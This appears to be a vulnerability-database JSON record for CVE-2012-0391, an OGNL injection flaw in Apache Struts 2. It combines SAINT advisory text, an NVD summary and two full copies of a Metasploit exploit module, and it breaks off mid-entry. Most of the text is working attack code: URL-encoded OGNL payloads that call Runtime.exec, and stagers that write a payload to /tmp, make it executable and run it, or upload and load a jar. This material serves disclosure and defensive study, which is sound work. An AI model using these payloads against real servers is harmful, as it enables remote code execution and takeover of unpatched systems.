Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture.
Problem
Struts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code.
This exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut).
The executable smbclient must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes (').
Platforms
Windows
{"id": "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "bulletinFamily": "exploit", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "published": "2012-08-02T00:00:00", "modified": "2012-08-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2012-0391"], "type": "saint", "lastseen": "2018-08-31T00:08:19", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2012-0391"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6ed418d87e4c8b1b4aaa0b90bd927ae6208bd3d8e9b46f02685dcc00a7b906d9", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7bc59b3330a7820a216ea06973b8f0c8", "key": "href"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "e3c39bc1738295ef164d0ee8d3b455cc", "key": "published"}, {"hash": "3e98ded44f1b4b4bf3f34877c3f24b81", "key": "cvelist"}, {"hash": "e96be3f2ece10a72ad66c24e4e26b88c", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "1299d5ff2de19400ae26d74b11116c26", "key": "title"}, {"hash": "e3c39bc1738295ef164d0ee8d3b455cc", "key": "modified"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "id": "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "lastseen": "2017-01-10T14:03:41", "modified": "2012-08-02T00:00:00", "objectVersion": "1.2", "published": "2012-08-02T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "type": "saint", "viewCount": 1}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2017-01-10T14:03:41"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2012-0391"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "bd2126c30d2dbd33b25237398a3108764a7d41d911531f04d834613f185918d3", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7bc59b3330a7820a216ea06973b8f0c8", "key": "href"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "e3c39bc1738295ef164d0ee8d3b455cc", "key": "published"}, {"hash": "3e98ded44f1b4b4bf3f34877c3f24b81", "key": "cvelist"}, {"hash": "e96be3f2ece10a72ad66c24e4e26b88c", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "1299d5ff2de19400ae26d74b11116c26", "key": "title"}, {"hash": "e3c39bc1738295ef164d0ee8d3b455cc", "key": "modified"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "id": "SAINT:7BC59B3330A7820A216EA06973B8F0C8", "lastseen": "2018-08-30T20:07:49", "modified": "2012-08-02T00:00:00", "objectVersion": "1.3", "published": "2012-08-02T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "type": "saint", "viewCount": 1}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T20:07:49"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "3e98ded44f1b4b4bf3f34877c3f24b81"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "e96be3f2ece10a72ad66c24e4e26b88c"}, {"key": "href", "hash": "7bc59b3330a7820a216ea06973b8f0c8"}, {"key": "modified", "hash": "e3c39bc1738295ef164d0ee8d3b455cc"}, {"key": "published", "hash": "e3c39bc1738295ef164d0ee8d3b455cc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a2e6da74c8b179f121f93bda28c97a91"}, {"key": "title", "hash": "1299d5ff2de19400ae26d74b11116c26"}, {"key": "type", "hash": "2a4c1f6b0cd88cf3fac4b56bd4283522"}], "hash": "6ed418d87e4c8b1b4aaa0b90bd927ae6208bd3d8e9b46f02685dcc00a7b906d9", "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0391"]}, {"type": "saint", "idList": ["SAINT:7B263B551E3799A3C795713D657E1BD2", "SAINT:4B122F6299581540A8429BAA06656ACE"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_EXCEPTION_DELEGATOR"]}, {"type": "nessus", "idList": ["STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL"]}, {"type": "d2", "idList": ["D2SEC_STRUTS2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113272"]}, {"type": "exploitdb", "idList": ["EDB-ID:18984", "EDB-ID:18329"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851"]}], "modified": "2018-08-31T00:08:19"}, "vulnersScore": 7.5}, "objectVersion": "1.3"}
{"cve": [{"lastseen": "2018-11-30T11:59:50", "bulletinFamily": "NVD", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "modified": "2018-11-23T09:36:02", "published": "2012-01-08T10:55:01", "id": "CVE-2012-0391", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0391", "title": "CVE-2012-0391", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-02-16T12:57:37", "bulletinFamily": "exploit", "description": "This module exploits a remote command execution vulnerability in Apache Struts versions < 2.2.1.1. This issue is caused because the ExceptionDelegator interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "modified": "2017-07-24T13:26:21", "published": "2012-06-03T20:08:31", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_EXCEPTION_DELEGATOR", "href": "", "type": "metasploit", "title": "Apache Struts Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts Remote Command Execution',\n 'Description' => %q{\n This module exploits a remote command execution vulnerability in\n Apache Struts versions < 2.2.1.1. This issue is caused because the\n ExceptionDelegator interprets parameter values as OGNL expressions\n during certain exception handling for mismatched data types of properties,\n which allows remote attackers to execute arbitrary Java code via a\n crafted parameter.\n },\n 'Author' =>\n [\n 'Johannes Dahse', # Vulnerability discovery and PoC\n 'Andreas Nusser', # Vulnerability discovery and PoC\n 'juan vazquez', # Metasploit module\n 'sinn3r', # Metasploit module\n 'mihi' # ARCH_JAVA support\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-0391'],\n [ 'OSVDB', '78277'],\n [ 'EDB', '18329']\n ],\n 'Platform' => %w{ java linux win },\n 'Privileged' => true,\n 'Targets' =>\n [\n ['Windows Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'CmdStagerFlavor' => 'tftp'\n }\n ],\n ['Linux Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ],\n [ 'Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n },\n ]\n ],\n 'DisclosureDate' => 'Jan 06 2012',\n 'DefaultTarget' => 2))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', \"\"]),\n OptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ])\n ])\n end\n\n def execute_command(cmd, opts = {})\n\n uri = String.new(datastore['TARGETURI'])\n uri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\"))%2b'\") if target['Platform'] == 'win'\n uri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\".split(\\\"@\\\")))%2b'\") if target['Platform'] == 'linux'\n uri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD,'')%2b'\") if target['Platform'] == 'java'\n uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))\n\n vprint_status(\"Attempting to execute: #{cmd}\")\n\n resp = send_request_raw({\n 'uri' => uri,\n 'version' => '1.1',\n 'method' => 'GET',\n }, 5)\n\n end\n\n def windows_stager\n exe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\"\n\n print_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\")\n execute_cmdstager({ :temp => '.' })\n @payload_exe = generate_payload_exe\n\n print_status(\"Attempting to execute the payload...\")\n execute_command(@payload_exe)\n end\n\n def linux_stager\n cmds = \"/bin/sh@-c@echo LINE | tee FILE\"\n exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)\n base64 = Rex::Text.encode_base64(exe)\n base64.gsub!(/\\=/, \"\\\\u003d\")\n file = rand_text_alphanumeric(4+rand(4))\n\n execute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\")\n cmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\")\n base64.each_line do |line|\n line.chomp!\n cmd = cmds\n cmd.gsub!(/LINE/, line)\n execute_command(cmds)\n end\n\n execute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\")\n execute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\")\n execute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\")\n\n execute_command(\"/bin/sh@-c@/tmp/#{file}\")\n @payload_exe = \"/tmp/\" + file\n end\n\n def java_upload_part(part, filename, append = 'false')\n cmd = \"\"\n cmd << \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\n cmd << \"#f.close()\"\n execute_command(cmd)\n end\n\n def java_stager\n @payload_exe = rand_text_alphanumeric(4+rand(4)) + \".jar\"\n append = 'false'\n jar = payload.encoded_jar.pack\n\n chunk_length = 384 # 512 bytes when base64 encoded\n\n while(jar.length > chunk_length)\n java_upload_part(jar[0, chunk_length], @payload_exe, append)\n jar = jar[chunk_length, jar.length - chunk_length]\n append='true'\n end\n java_upload_part(jar, @payload_exe, append)\n\n cmd = \"\"\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\n # create classloader\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\n # load class\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\n # invoke main method\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\n execute_command(cmd)\n end\n\n def on_new_session(client)\n\n if client.type != \"meterpreter\"\n print_error(\"Please use a meterpreter payload in order to automatically cleanup.\")\n print_error(\"The #{@payload_exe} file must be removed manually.\")\n return\n end\n\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n\n if client.sys.config.sysinfo[\"OS\"] =~ /Windows/\n print_error(\"Windows does not allow running executables to be deleted\")\n print_error(\"The #{@payload_exe} file must be removed manually after migrating\")\n return\n end\n\n print_warning(\"Deleting the #{@payload_exe} file\")\n client.fs.file.rm(@payload_exe)\n\n end\n\n def exploit\n unless datastore['CMD'].blank?\n print_status(\"Executing user supplied command\")\n execute_command(datastore['CMD'])\n return\n end\n\n case target['Platform']\n when 'linux'\n linux_stager\n when 'win'\n windows_stager\n when 'java'\n java_stager\n else\n fail_with(Failure::NoTarget, 'Unsupported target platform!')\n end\n\n handler\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb"}], "saint": [{"lastseen": "2016-12-14T16:58:06", "bulletinFamily": "exploit", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-08-02T00:00:00", "published": "2012-08-02T00:00:00", "id": "SAINT:4B122F6299581540A8429BAA06656ACE", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "description": "Added: 08/02/2012 \nCVE: [CVE-2012-0391](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0391>) \nOSVDB: [78277](<http://www.osvdb.org/78277>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.2.3.1 do not properly delegate exceptions when assigning values to properties. If a type occurs, Struts 2 may allow the OGNL values to be interpreted as Java code. \n\n### Resolution\n\nUpgrade to [Struts 2.2.3.1](<http://struts.apache.org/download.cgi#struts2231>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/version-notes-2311.html> \n<https://issues.apache.org/jira/browse/WW-3668> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.2.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-08-02T00:00:00", "published": "2012-08-02T00:00:00", "id": "SAINT:7B263B551E3799A3C795713D657E1BD2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_conversionerrorinterceptor_java_injection", "type": "saint", "title": "Apache Struts 2 ConversionErrorInterceptor Java Injection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T10:50:24", "bulletinFamily": "exploit", "description": "Apache Struts. CVE-2012-0391. Remote exploits for multiple platform", "modified": "2012-06-05T00:00:00", "published": "2012-06-05T00:00:00", "id": "EDB-ID:18984", "href": "https://www.exploit-db.com/exploits/18984/", "type": "exploitdb", "title": "Apache Struts <= 2.2.1.1 - Remote Command Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::CmdStagerTFTP\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apache Struts <= 2.2.1.1 Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a remote command execution vulnerability in\r\n\t\t\t\tApache Struts versions < 2.2.1.1. This issue is caused because the\r\n\t\t\t\tExceptionDelegator interprets parameter values as OGNL expressions\r\n\t\t\t\tduring certain exception handling for mismatched data types of properties,\r\n\t\t\t\twhich allows remote attackers to execute arbitrary Java code via a\r\n\t\t\t\tcrafted parameter.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Johannes Dahse', # Vulnerability discovery and PoC\r\n\t\t\t\t\t'Andreas Nusser', # Vulnerability discovery and PoC\r\n\t\t\t\t\t'juan vazquez', # Metasploit module\r\n\t\t\t\t\t'sinn3r' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0391'],\r\n\t\t\t\t\t[ 'OSVDB', '78277'],\r\n\t\t\t\t\t[ 'EDB', '18329'],\r\n\t\t\t\t\t[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'win', 'linux'],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['Linux Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 06 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(8080),\r\n\t\t\t\t\tOptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', \"\"]),\r\n\t\t\t\t\tOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef execute_command(cmd, opts = {})\r\n\r\n\t\turi = String.new(datastore['TARGETURI'])\r\n\t\turi.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\"))%2b'\") if target['Platform'] == 'win'\r\n\t\turi.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\".split(\\\"@\\\")))%2b'\") if target['Platform'] == 'linux'\r\n\t\turi.gsub!(/CMD/, Rex::Text::uri_encode(cmd))\r\n\r\n\t\tvprint_status(\"Attempting to execute: #{cmd}\")\r\n\r\n\t\tresp = send_request_raw({\r\n\t\t\t'uri' => uri,\r\n\t\t\t'version' => '1.1',\r\n\t\t\t'method' => 'GET',\r\n\t\t}, 5)\r\n\r\n\tend\r\n\r\n\tdef windows_stager\r\n\t\texe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\"\r\n\r\n\t\tprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\")\r\n\t\texecute_cmdstager({ :temp => '.'})\r\n\t\t@payload_exe = payload_exe\r\n\r\n\t\tprint_status(\"Attempting to execute the payload...\")\r\n\t\texecute_command(@payload_exe)\r\n\tend\r\n\r\n\tdef linux_stager\r\n\t\tcmds = \"/bin/sh@-c@echo LINE | tee FILE\"\r\n\t\texe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)\r\n\t\tbase64 = Rex::Text.encode_base64(exe)\r\n\t\tbase64.gsub!(/\\=/, \"\\\\u003d\")\r\n\t\tfile = rand_text_alphanumeric(4+rand(4))\r\n\r\n\t\texecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\")\r\n\t\tcmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\")\r\n\t\tbase64.each_line do |line|\r\n\t\t\tline.chomp!\r\n\t\t\tcmd = cmds\r\n\t\t\tcmd.gsub!(/LINE/, line)\r\n\t\t\texecute_command(cmds)\r\n\t\tend\r\n\r\n\t\texecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\")\r\n\t\texecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\")\r\n\t\texecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\")\r\n\r\n\t\texecute_command(\"/bin/sh@-c@/tmp/#{file}\")\r\n\t\t@payload_exe = \"/tmp/\" + file\r\n\tend\r\n\r\n\tdef on_new_session(client)\r\n\t\tif target['Platform'] == 'linux'\r\n\t\t\tprint_status(\"Deleting #{@payload_exe} payload file\")\r\n\t\t\texecute_command(\"/bin/sh@-c@rm #{@payload_exe}\")\r\n\t\telse\r\n\t\t\tprint_status(\"Windows does not allow running executables to be deleted\")\r\n\t\t\tprint_status(\"Delete the #{@payload_exe} file manually after migrating\")\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tif not datastore['CMD'].empty?\r\n\t\t\tprint_status(\"Executing user supplied command\")\r\n\t\t\texecute_command(datastore['CMD'])\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tcase target['Platform']\r\n\t\t\twhen 'linux'\r\n\t\t\t\tlinux_stager\r\n\t\t\twhen 'win'\r\n\t\t\t\twindows_stager\r\n\t\t\telse\r\n\t\t\t\traise RuntimeError, 'Unsupported target platform!'\r\n\t\tend\r\n\r\n\t\thandler\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18984/"}, {"lastseen": "2016-02-02T09:32:08", "bulletinFamily": "exploit", "description": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities. CVE-2012-0391,CVE-2012-0392,CVE-2012-0393,CVE-2012-0394. Webapps exploits for multiple platform", "modified": "2012-01-06T00:00:00", "published": 